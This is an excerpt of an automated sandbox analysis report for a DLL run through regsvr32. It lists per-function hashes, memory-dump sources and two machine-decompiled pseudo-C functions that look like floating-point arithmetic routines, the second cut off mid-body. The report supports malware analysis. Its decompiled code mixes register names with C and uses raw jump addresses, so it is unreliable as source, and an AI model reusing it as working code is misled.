Opcode Fuzzy Hash: 91b8c8d5e853583d3d1a4b143dba9b680e3fdd6e0d47eec3f1e6f3b81338a568
Instruction Fuzzy Hash: 94414C7050074E8BEF58DF24D88A6DA3FA0FB58398F11461DFC5996290C3B8D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001BE70 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

Nn.W, xrefs: 000000018001BF2B

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Nn.W
API String ID: 0-3872316227
Opcode ID: b5c4fa6daf60d1671f16cc53c8ab824c55c17c66ee48abc462351e50a169873d
Instruction ID: dc0e48a23cb7ee8f93eb512a2fa3fc80c6e41eff836c457cd4608e988600616e
Opcode Fuzzy Hash: b5c4fa6daf60d1671f16cc53c8ab824c55c17c66ee48abc462351e50a169873d
Instruction Fuzzy Hash: 7551C2B181038ECFDB48CFA4C88A5CE7BB0FF18358F104A19E865A6264D3B49665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800167C4 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

, xrefs: 000000018001680F

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-2867612384
Opcode ID: 5b717d18ba60d9c75cf0431fe07eafca68898ff4c6d75803cf7f01b673b45413
Instruction ID: 0021e0fee05d7ab9d294f559ae10260a833c8ca285717dcefd08abab0448beef
Opcode Fuzzy Hash: 5b717d18ba60d9c75cf0431fe07eafca68898ff4c6d75803cf7f01b673b45413
Instruction Fuzzy Hash: 8441E1B190074A8FCF49CF68C48A5EE7FB0FB58358F10461DE85AA6290D3B89694CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003310 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

(, xrefs: 0000000180003392

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: ca8f72f29fcf747e54bb8de48d0f204d7c792f82ef911c9dd40d775a8ce8755f
Instruction ID: 533401c9c5252423168e53d1919849599028f9b5305fd6d15dc619656584330d
Opcode Fuzzy Hash: ca8f72f29fcf747e54bb8de48d0f204d7c792f82ef911c9dd40d775a8ce8755f
Instruction Fuzzy Hash: 10315B705097049FE3D9CF19C18972ABAE1FB88744F80992DF485DB3A0CB79D948CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003CD8 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

*, xrefs: 0000000180003D8A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *
API String ID: 0-3951701628
Opcode ID: dba3190842208ea0f9d7716eaba2b362d887f1657f173cf3b900ec165af27631
Instruction ID: 960ceefefab9737365ba16b8c95702dec69b411f57dfdd255b94d04c422ec242
Opcode Fuzzy Hash: dba3190842208ea0f9d7716eaba2b362d887f1657f173cf3b900ec165af27631
Instruction Fuzzy Hash: A041B1B090074A8BDF48CF64C48A5EE7FB0FB58398F504619E856A6290D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018698 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

}^, xrefs: 000000018001873A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: }^
API String ID: 0-1469802935
Opcode ID: 914a3f71b8c960fc7552931713e6e4203ade46d5e10d6b98f1cf6f38eefb5a81
Instruction ID: 205a07136b3df52e6849c72addd42ae462c7a889fd8c6357997c34b93d1030d5
Opcode Fuzzy Hash: 914a3f71b8c960fc7552931713e6e4203ade46d5e10d6b98f1cf6f38eefb5a81
Instruction Fuzzy Hash: DF41D7B190034E8FDB44CF68C8864CE7FB0FF28398F214609E855A6260D7B896A5CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FDC0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

]p, xrefs: 000000018001FEEF

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ]p
API String ID: 0-516505818
Opcode ID: a998b0c13b7dc478d418a24d321567b15ee48922d17bb3810592d0e5bb1ad7d1
Instruction ID: 931c66f535a299917143666a581b343279f23c4536418fb3d7e10e5e5ff67911
Opcode Fuzzy Hash: a998b0c13b7dc478d418a24d321567b15ee48922d17bb3810592d0e5bb1ad7d1
Instruction Fuzzy Hash: 55419DB1D0071E8BDF88DFA9C88A5EEBBB1FB58708F008219D511B6290C378564ACF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001FE8 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

/*, xrefs: 0000000180002080

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /*
API String ID: 0-2290017092
Opcode ID: a0d690a9e8e4b56653d5edd2257bb541ac33038840f1916700257e3302b896e6
Instruction ID: 439259a45eee3d69469051f7f04d9dd32eb749afa30bce0d9922454acc75758b
Opcode Fuzzy Hash: a0d690a9e8e4b56653d5edd2257bb541ac33038840f1916700257e3302b896e6
Instruction Fuzzy Hash: AC3161B4529381ABD388DF28C09592ABBE1FBC9304F806A1DF8C6C6750D774D555CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CAB4 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

';, xrefs: 000000018000CB9C

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ';
API String ID: 0-706169278
Opcode ID: 9587db4b2b67fd753a018cb568408f52bd3cf40bd4a4250c7a41da4824b20b5e
Instruction ID: 84ad4d37d5b24612e456a33eed3795b6879453dbc847852894b69ace4711b10a
Opcode Fuzzy Hash: 9587db4b2b67fd753a018cb568408f52bd3cf40bd4a4250c7a41da4824b20b5e
Instruction Fuzzy Hash: AB319DB091038A8BCB48DF68D9464DA3BF4FB19348F004A1AFC66DA250D7B4DA25CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000320C Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

q*, xrefs: 0000000180003228

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: q*
API String ID: 0-2890306462
Opcode ID: e9b16eeb3c05b2dc58fd23e485c86fcc911b04417d1bf7a2c55211357001d955
Instruction ID: 426e468f8026e0b8476299c89ff0f5963c52ec6ee03c74d60595b1f09b38f2d3
Opcode Fuzzy Hash: e9b16eeb3c05b2dc58fd23e485c86fcc911b04417d1bf7a2c55211357001d955
Instruction Fuzzy Hash: 10318BB590038E8BDB48DF29C84A5DE3BA0FB48348B104A29EC2A97350D3B4D664CB95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E97C Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

"0, xrefs: 000000018000EA2D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "0
API String ID: 0-3232916595
Opcode ID: ced349a475a942435a58068fa7b5306d4e3e18ca1265cbbaffadb78cb52945e5
Instruction ID: 46df1953fb5514d0ded986e47b465898ac2105ade71d931b54119c8741523ee4
Opcode Fuzzy Hash: ced349a475a942435a58068fa7b5306d4e3e18ca1265cbbaffadb78cb52945e5
Instruction Fuzzy Hash: 1C217BB45183858BD348DF28C08A51ABBE0FB8D30DF404B1DF8CAAA291D779D6158B4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A27C Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Ki, xrefs: 000000018001A38D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ki
API String ID: 0-1715101133
Opcode ID: 4558f2da13ee0eaafe55bb3c5df4eb9d1fb5f9a618e6666c492359686f956a93
Instruction ID: 52fffbabfede286418100c7ee1af114bc6e995e3ef61a1078acf41130dd1023c
Opcode Fuzzy Hash: 4558f2da13ee0eaafe55bb3c5df4eb9d1fb5f9a618e6666c492359686f956a93
Instruction Fuzzy Hash: 3C317AB55083858BD348DF28C45951BBBF1FB8C348F410B6DF4CAAA260D778D645CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FF28 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

NR, xrefs: 000000018001FFC7

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: NR
API String ID: 0-2856730796
Opcode ID: 985ffab200b1932dba1a0035db10e8c0f4a764b8fe9193c8efc1cd14a1e7751e
Instruction ID: 888a1bda249568a86adefe0d71e9aa6d507bdbf24dfed568917928c09168a45c
Opcode Fuzzy Hash: 985ffab200b1932dba1a0035db10e8c0f4a764b8fe9193c8efc1cd14a1e7751e
Instruction Fuzzy Hash: 70317EB06087858FD748DF28D15A52ABBE1BB9C318F444B1DF4CAAA394D3789604CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B9B4 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

>, xrefs: 000000018000BA1D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-1166260821
Opcode ID: c9bbd9a1c8764c77f55e3730fede6ce06dcc687d073aaf0b9075fbd9e781daa6
Instruction ID: ec8c7fb501e6ecfaf473a8fb5074ea7b0052bf43d6134118ad317f941d440be4
Opcode Fuzzy Hash: c9bbd9a1c8764c77f55e3730fede6ce06dcc687d073aaf0b9075fbd9e781daa6
Instruction Fuzzy Hash: 443138B55187808BD348DF28C55541BBBE1BBCC748F804B1DF4CAAB260D778E645CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015240 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

+~, xrefs: 00000001800152CA

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +~
API String ID: 0-2148840365
Opcode ID: 45cfc3e6f9e7ae098d08d6113d120eb16da4ef82f298c2b9d0a2a09659ef3253
Instruction ID: cb17ed4ef4a7a2aff8d25f33b410329614a0d5b560dda5608ecb6f3f583f77ba
Opcode Fuzzy Hash: 45cfc3e6f9e7ae098d08d6113d120eb16da4ef82f298c2b9d0a2a09659ef3253
Instruction Fuzzy Hash: AE2148B46093848FD389DF28C48951BBBE1BB9C708F404B2DF4DEA6260D7789644CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015020 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

.s, xrefs: 0000000180015024

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .s
API String ID: 0-2211593045
Opcode ID: a89e1310f1b33d0137d7e7206c74e0aa433ec271eea8e6e9d2676072d0a6b0e0
Instruction ID: ed3710ea687b0090dfe407479a03e5a36cf91d591a0993f6692bb9680592a455
Opcode Fuzzy Hash: a89e1310f1b33d0137d7e7206c74e0aa433ec271eea8e6e9d2676072d0a6b0e0
Instruction Fuzzy Hash: A42164B05187858FE388DF28C04A80BBBE0BB9D358F404B1DF4CAA6264D378D644CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07C420 Relevance: .3, Instructions: 272
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00007FFD7FFD2B07C420(void* __ecx, signed int __edx, long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r11, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr _v70;
				unsigned long long _v72;
				signed int _v78;
				signed int _v80;
				intOrPtr _v82;
				unsigned int _v84;
				signed short _v86;
				signed int _v88;
				void* _v96;
				signed int _v104;
				signed int _v112;
				intOrPtr _v116;
				signed int _v120;
				signed short _t93;
				signed short _t94;
				signed int _t112;
				signed short _t113;
				intOrPtr _t114;
				signed int _t119;
				intOrPtr _t126;
				intOrPtr _t128;
				unsigned int _t129;
				unsigned int _t130;
				signed short _t132;
				signed short _t139;
				signed short _t140;
				intOrPtr _t152;
				signed int _t155;
				signed int _t167;
				signed int _t190;
				signed int _t191;
				signed long long _t201;
				signed long long _t202;
				long long _t203;
				unsigned long long _t207;
				void* _t209;
				intOrPtr* _t212;
				intOrPtr* _t213;
				void* _t222;
				void* _t225;
				long long* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t233;

				_t231 = __r11;
				_t203 = __rbx;
				if (__edx == 0) goto 0x2b07c7bd;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_push(_t233);
				_t223 = _t222 - 0x50;
				_t201 =  *0x2b0c70a0; // 0xf787487f4682
				_t202 = _t201 ^ _t222 - 0x00000050;
				_v56 = _t202;
				r11d = __edx;
				_v96 = __rcx;
				if (__edx >= 0) goto 0x2b07c47e;
				r11d =  ~r11d;
				if (r8d != 0) goto 0x2b07c486;
				 *((short*)(__rcx)) = 0;
				_t167 = r11d;
				if (_t167 == 0) goto 0x2b07c794;
				_t6 = _t203 + 1; // 0x8000
				r12d = _t6;
				r11d = r11d >> 3;
				_v104 = r11d;
				if (_t167 == 0) goto 0x2b07c78b;
				_t212 = 0x7ffd2b0c86f4 + (_t202 + _t202 * 2) * 4;
				if ( *_t212 - r12w < 0) goto 0x2b07c4e0;
				_t207 =  *_t212;
				_t213 =  &_v72;
				_v72 = _t207;
				_v64 =  *((intOrPtr*)(_t212 + 8));
				_v70 = __ecx - 1;
				_t139 =  *(_t213 + 0xa) & 0x0000ffff;
				_t93 =  *(__rcx + 0xa) & 0x0000ffff;
				_v112 = 0;
				r10d = _t139 & 0x0000ffff;
				_t140 = _t139 & 0x00007fff;
				_v88 = 0;
				r10w = r10w ^ _t93;
				_t94 = _t93 & 0x00007fff;
				_v80 = 0;
				r10w = r10w & r12w;
				r8d = _t202 + (_t207 >> 0x10);
				_v120 = r10w;
				if (_t94 - 0x7fff >= 0) goto 0x2b07c770;
				if (_t140 - 0x7fff >= 0) goto 0x2b07c770;
				if (r8w - 0xbffd > 0) goto 0x2b07c76b;
				r10d = 0x3fbf;
				if (r8w - r10w > 0) goto 0x2b07c554;
				 *((long long*)(__rcx + 4)) = 0;
				 *((intOrPtr*)(__rcx)) = 0;
				goto 0x2b07c78b;
				if (_t94 != 0) goto 0x2b07c579;
				r8w = r8w + 1;
				if (( *(__rcx + 8) & 0x7fffffff) != 0) goto 0x2b07c579;
				if ( *((intOrPtr*)(__rcx + 4)) != 0) goto 0x2b07c579;
				if ( *((intOrPtr*)(__rcx)) != 0) goto 0x2b07c579;
				 *(__rcx + 0xa) = 0;
				goto 0x2b07c54a;
				if (_t140 != 0) goto 0x2b07c594;
				r8w = r8w + 1;
				if (( *(_t213 + 8) & 0x7fffffff) != 0) goto 0x2b07c594;
				if ( *((intOrPtr*)(_t213 + 4)) != 0) goto 0x2b07c594;
				if ( *_t213 == 0) goto 0x2b07c53f;
				r11d = 0;
				_t229 =  &_v84;
				_t35 = _t231 + 5; // 0x5
				_t152 = _t35;
				r12d = r11d;
				_v116 = _t152;
				_t209 = _t233 + _t233;
				if (_t152 <= 0) goto 0x2b07c60b;
				_t39 = _t213 + 8; // 0x3fc7
				r9d = r12d & 0x00000001;
				_t126 = _t202 + _t209;
				if (_t126 -  *((intOrPtr*)(_t229 - 4)) < 0) goto 0x2b07c5dd;
				if (_t126 - ( *_t39 & 0x0000ffff) * ( *(_t209 + __rcx) & 0x0000ffff) >= 0) goto 0x2b07c5e2;
				 *((intOrPtr*)(_t229 - 4)) = _t126;
				if (1 == 0) goto 0x2b07c5f3;
				 *_t229 =  *_t229 + 1;
				_t128 = _v116 - 1;
				_v116 = _t128;
				if (_t128 > 0) goto 0x2b07c5c0;
				r12d = r12d + 1;
				if (_t152 - 1 > 0) goto 0x2b07c5a2;
				r10d = _v80;
				_t129 = _v88;
				r8w = r8w + 0xc002;
				r14d = 0xffff;
				if (r8w <= 0) goto 0x2b07c66d;
				if (r10d < 0) goto 0x2b07c667;
				r10d = r10d + r10d;
				_t130 = _t129 + _t129;
				r8w = r8w + r14w;
				r10d = r10d | _v84 >> 0x0000001f;
				_v88 = _t130;
				_v84 = __rdi + __rdi | _t129 >> 0x0000001f;
				_v80 = r10d;
				if (r8w > 0) goto 0x2b07c634;
				_t190 = r8w;
				if (_t190 > 0) goto 0x2b07c6ce;
				r8w = r8w + r14w;
				if (_t190 >= 0) goto 0x2b07c6ce;
				r9d = _v112;
				r8w = r8w + ( ~(r8w & 0xffffffff) & 0x0000ffff);
				_t191 = _v88 & sil;
				if (_t191 == 0) goto 0x2b07c68e;
				r9d = r9d + 1;
				_t155 = _v84;
				r10d = r10d >> 1;
				_t132 = _t130 >> 0x00000001 | _t155 << 0x0000001f;
				_v84 = _t155 >> 0x00000001 | r10d << 0x0000001f;
				_v88 = _t132;
				if (_t191 != 0) goto 0x2b07c685;
				_t228 = _v96;
				_v80 = r10d;
				if (r9d == 0) goto 0x2b07c6ce;
				_v88 = _t132 & 0x0000ffff | 0x00000001;
				goto 0x2b07c6d2;
				r11d = _v104;
				r12d = 0x8000;
				if ((_v88 & 0x0000ffff) - r12w > 0) goto 0x2b07c6f0;
				if ((_v88 & 0x0001ffff) != 0x18000) goto 0x2b07c736;
				if (_v86 != 0xffffffff) goto 0x2b07c731;
				_v86 = 0;
				if (_v82 != 0xffffffff) goto 0x2b07c726;
				_t112 = _v78 & 0x0000ffff;
				_v82 = 0;
				if (_t112 != r14w) goto 0x2b07c71d;
				_v78 = r12w;
				r8w = r8w + 1;
				goto 0x2b07c72b;
				_t113 = _t112 + 1;
				_v78 = _t113;
				goto 0x2b07c72b;
				_t114 = _t113 + 1;
				_v82 = _t114;
				r10d = _v80;
				goto 0x2b07c738;
				_v86 = _t114 + 1;
				if (r8w - 0x7fff < 0) goto 0x2b07c74c;
				goto 0x2b07c774;
				r8w = r8w | _v120;
				 *(_t228 + 6) = r10d;
				 *_t228 = _v86 & 0x0000ffff;
				_t119 = _v84;
				 *(_t228 + 0xa) = r8w;
				 *(_t228 + 2) = _t119;
				goto 0x2b07c78b;
				r10w =  ~r10w;
				asm("sbb eax, eax");
				 *_t228 = 0;
				 *((intOrPtr*)(_t228 + 8)) = (_t119 & 0x80000000) + 0x7fff8000;
				if (r11d != 0) goto 0x2b07c49d;
				return E00007FFD7FFD2B064980(_t155 << 0x1f, _v56 ^ _t223, _t213 - __rsi, _t225);
			}

0x7ffd2b07c420
0x7ffd2b07c420
0x7ffd2b07c422
0x7ffd2b07c428
0x7ffd2b07c42d
0x7ffd2b07c432
0x7ffd2b07c438
0x7ffd2b07c443
0x7ffd2b07c447
0x7ffd2b07c44e
0x7ffd2b07c451
0x7ffd2b07c45e
0x7ffd2b07c468
0x7ffd2b07c46e
0x7ffd2b07c477
0x7ffd2b07c481
0x7ffd2b07c483
0x7ffd2b07c486
0x7ffd2b07c489
0x7ffd2b07c499
0x7ffd2b07c499
0x7ffd2b07c4a0
0x7ffd2b07c4ab
0x7ffd2b07c4af
0x7ffd2b07c4bb
0x7ffd2b07c4c4
0x7ffd2b07c4c6
0x7ffd2b07c4cc
0x7ffd2b07c4d0
0x7ffd2b07c4d8
0x7ffd2b07c4dd
0x7ffd2b07c4e0
0x7ffd2b07c4e4
0x7ffd2b07c4e9
0x7ffd2b07c4ec
0x7ffd2b07c4f0
0x7ffd2b07c4f3
0x7ffd2b07c4fb
0x7ffd2b07c4ff
0x7ffd2b07c502
0x7ffd2b07c505
0x7ffd2b07c509
0x7ffd2b07c50d
0x7ffd2b07c515
0x7ffd2b07c51e
0x7ffd2b07c52d
0x7ffd2b07c533
0x7ffd2b07c53d
0x7ffd2b07c53f
0x7ffd2b07c547
0x7ffd2b07c54f
0x7ffd2b07c557
0x7ffd2b07c559
0x7ffd2b07c565
0x7ffd2b07c56b
0x7ffd2b07c570
0x7ffd2b07c572
0x7ffd2b07c577
0x7ffd2b07c57c
0x7ffd2b07c57e
0x7ffd2b07c589
0x7ffd2b07c58e
0x7ffd2b07c592
0x7ffd2b07c594
0x7ffd2b07c597
0x7ffd2b07c59b
0x7ffd2b07c59b
0x7ffd2b07c59f
0x7ffd2b07c5a6
0x7ffd2b07c5a9
0x7ffd2b07c5ae
0x7ffd2b07c5b7
0x7ffd2b07c5bd
0x7ffd2b07c5d2
0x7ffd2b07c5d7
0x7ffd2b07c5db
0x7ffd2b07c5e4
0x7ffd2b07c5ed
0x7ffd2b07c5ef
0x7ffd2b07c5fe
0x7ffd2b07c600
0x7ffd2b07c605
0x7ffd2b07c611
0x7ffd2b07c616
0x7ffd2b07c618
0x7ffd2b07c61c
0x7ffd2b07c624
0x7ffd2b07c628
0x7ffd2b07c632
0x7ffd2b07c637
0x7ffd2b07c63e
0x7ffd2b07c644
0x7ffd2b07c64e
0x7ffd2b07c654
0x7ffd2b07c657
0x7ffd2b07c65a
0x7ffd2b07c65d
0x7ffd2b07c665
0x7ffd2b07c667
0x7ffd2b07c66b
0x7ffd2b07c66d
0x7ffd2b07c671
0x7ffd2b07c673
0x7ffd2b07c681
0x7ffd2b07c685
0x7ffd2b07c689
0x7ffd2b07c68b
0x7ffd2b07c68e
0x7ffd2b07c6a2
0x7ffd2b07c6a5
0x7ffd2b07c6aa
0x7ffd2b07c6ad
0x7ffd2b07c6b0
0x7ffd2b07c6b5
0x7ffd2b07c6b9
0x7ffd2b07c6bd
0x7ffd2b07c6c5
0x7ffd2b07c6cc
0x7ffd2b07c6d2
0x7ffd2b07c6d6
0x7ffd2b07c6e0
0x7ffd2b07c6ee
0x7ffd2b07c6f6
0x7ffd2b07c6fd
0x7ffd2b07c703
0x7ffd2b07c705
0x7ffd2b07c709
0x7ffd2b07c710
0x7ffd2b07c712
0x7ffd2b07c717
0x7ffd2b07c71b
0x7ffd2b07c71d
0x7ffd2b07c720
0x7ffd2b07c724
0x7ffd2b07c726
0x7ffd2b07c728
0x7ffd2b07c72b
0x7ffd2b07c72f
0x7ffd2b07c733
0x7ffd2b07c741
0x7ffd2b07c74a
0x7ffd2b07c750
0x7ffd2b07c755
0x7ffd2b07c759
0x7ffd2b07c75d
0x7ffd2b07c760
0x7ffd2b07c765
0x7ffd2b07c769
0x7ffd2b07c770
0x7ffd2b07c774
0x7ffd2b07c776
0x7ffd2b07c787
0x7ffd2b07c78e
0x7ffd2b07c7bd

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3927026404e4a427414931410251a7ff08b57083af26ce8eba506bdcdd4d50f3
Instruction ID: 2583fadc6a1dc9d4010af454932462b80e54931d111d333525203eca38295a57
Opcode Fuzzy Hash: 3927026404e4a427414931410251a7ff08b57083af26ce8eba506bdcdd4d50f3
Instruction Fuzzy Hash: 1AB11177F152528AF726CF64CA506BCB7B0FB19748F508136EE0953694EBB8A840E740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07C0E8 Relevance: .2, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00007FFD7FFD2B07C0E8(long long __rbx, signed short* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
				signed int _v56;
				signed int _v62;
				signed int _v64;
				signed short _v66;
				unsigned int _v68;
				signed short _v70;
				signed short _v72;
				void* _v80;
				signed short _v84;
				signed short _v86;
				signed short _v88;
				signed short _t77;
				signed short _t78;
				signed int _t94;
				signed short _t95;
				signed short _t96;
				signed int _t100;
				signed short _t108;
				signed short _t109;
				signed int _t113;
				signed int _t114;
				unsigned int _t129;
				signed int _t160;
				signed int _t161;
				signed long long _t170;
				signed long long _t171;
				intOrPtr* _t175;
				void* _t186;
				long long* _t191;
				void* _t193;
				void* _t195;
				signed short _t196;
				signed short* _t197;

				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t187 = _t186 - 0x30;
				_t170 =  *0x2b0c70a0; // 0xf787487f4682
				_t171 = _t170 ^ _t186 - 0x00000030;
				_v56 = _t171;
				_t77 =  *(__rdx + 0xa) & 0x0000ffff;
				r14d = 0;
				_v80 = __rcx;
				_t108 = __rcx[5] & 0x0000ffff;
				_v84 = r14d;
				_t109 = _t108 & 0x00007fff;
				_t78 = _t77 & 0x00007fff;
				_v72 = _t196;
				r9d = __rcx + _t171;
				_v64 = r14d;
				_v86 = (_t77 & 0x0000ffff ^ _t108) & 0x00008000;
				_v88 = r9w;
				if (_t109 - 0x7fff >= 0) goto 0x2b07c3de;
				if (_t78 - 0x7fff >= 0) goto 0x2b07c3de;
				if (r9w - 0xbffd > 0) goto 0x2b07c3de;
				if (r9w - 0x3fbf > 0) goto 0x2b07c194;
				__rcx[2] = _t196;
				 *__rcx = r14d;
				goto 0x2b07c3f6;
				r13d = 1;
				if (_t109 != 0) goto 0x2b07c1c8;
				r9w = r9w + r13w;
				_v88 = r9w;
				if ((__rcx[4] & 0x7fffffff) != 0) goto 0x2b07c1c8;
				if (__rcx[2] != r14d) goto 0x2b07c1c8;
				if ( *__rcx != r14d) goto 0x2b07c1c8;
				__rcx[5] = r14w;
				goto 0x2b07c3f6;
				if (_t78 != 0) goto 0x2b07c1ea;
				r9w = r9w + r13w;
				_v88 = r9w;
				if (( *(__rdx + 8) & 0x7fffffff) != 0) goto 0x2b07c1ea;
				if ( *((intOrPtr*)(__rdx + 4)) != r14d) goto 0x2b07c1ea;
				if ( *__rdx == r14d) goto 0x2b07c188;
				_t26 =  &_v68; // -27
				_t175 = _t26;
				r13d = 5;
				_t193 = __rbx + __rbx;
				if (5 <= 0) goto 0x2b07c25d;
				_t197 = __rdx + 8;
				r8d = 0;
